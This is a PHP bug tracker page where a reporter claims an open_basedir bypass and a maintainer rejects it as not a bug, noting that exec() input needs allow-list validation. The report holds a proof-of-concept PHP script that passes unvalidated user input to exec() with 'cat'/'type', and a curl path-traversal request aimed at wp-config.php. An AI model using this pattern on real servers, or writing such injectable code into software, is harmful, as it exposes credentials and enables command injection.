php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Sec Bug #81715 Apache + PHP <= 8.1.4 open_basedir bypass‏‏
Submitted: 2022-04-06 19:14 UTC Modified: 2022-04-07 09:46 UTC
From: phpforwork at gmail dot com Assigned: cmb (profile)
Status: Not a bug Package: *Directory/Filesystem functions
PHP Version: 8.1.4 OS: Linux/Windows
Private report: No CVE-ID: None
Welcome back! If you're the original bug submitter, here's where you can edit the bug or add additional notes.
If you forgot your password, you can retrieve your password here.
Password:
Status:
Package:
Bug Type:
Summary:
From: phpforwork at gmail dot com
New email:
PHP Version: OS:

 

 [2022-04-06 19:14 UTC] phpforwork at gmail dot com
Description:
------------
Description:
=============
open_basedir security feature can be bypassed and read the file outside the open_basedir path.


Proof of Concept
================
0. The target file you want to read C:/xampp/htdocs/wp-config.php
1. Set open_basedir as a security feature in php.ini file :
open_basedir = C:/xampp/htdocs/test
2. Make a PHP script, "bypass.php" inside folder *test* :
<?php
$dir = new SplFileInfo($_GET['file']);
var_dump(exec("type ".$dir->getRealPath()." > result.txt"));
?>
for Linux webserver :
<?php
$dir = new SplFileInfo($_GET['file']);
var_dump(exec("cat ".$dir->getRealPath()." > result.txt"));
?>
3. Call the script :
curl localhost/test/bypass.php?file=../wp-config.php
4. You will see the full content of the file here : result.txt

Tested with PHP 5.6.3 and 7.x. and 8.x.
=====================

Reported by : Saleh 0xHunter ( twitter.com/0xhunter )

Test script:
---------------
For Windows webserver :
<?php
$dir = new SplFileInfo($_GET['file']);
var_dump(exec("type ".$dir->getRealPath()." > result.txt"));
?>
for Linux webserver :
<?php
$dir = new SplFileInfo($_GET['file']);
var_dump(exec("cat ".$dir->getRealPath()." > result.txt"));
?>


Patches

Pull Requests

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2022-04-07 09:46 UTC] cmb@php.net
-Status: Open +Status: Not a bug -Assigned To: +Assigned To: cmb
 [2022-04-07 09:46 UTC] cmb@php.net
From the PHP manual[1]:

| open_basedir is just an extra safety net, that is in no way
| comprehensive, and can therefore not be relied upon when security
| is needed.

Consequently, our security classification[2] doesn't regard
open_basedir bypasses as security issues.

External programs just don't know about open_basedir.  For several
reasons, user input that is passed to any of the program execution
functions needs to be thoroughly validated by the userland script;
in this case you want to introduce some allow-list and verify that
the supplied path is in that list, and otherwise reject the
request.

[1] <https://www.php.net/manual/en/ini.core.php#ini.open-basedir>
[2] <https://wiki.php.net/security>
 
PHP Copyright © 2001-2024 The PHP Group
All rights reserved.
Last updated: Tue Oct 15 09:01:26 2024 UTC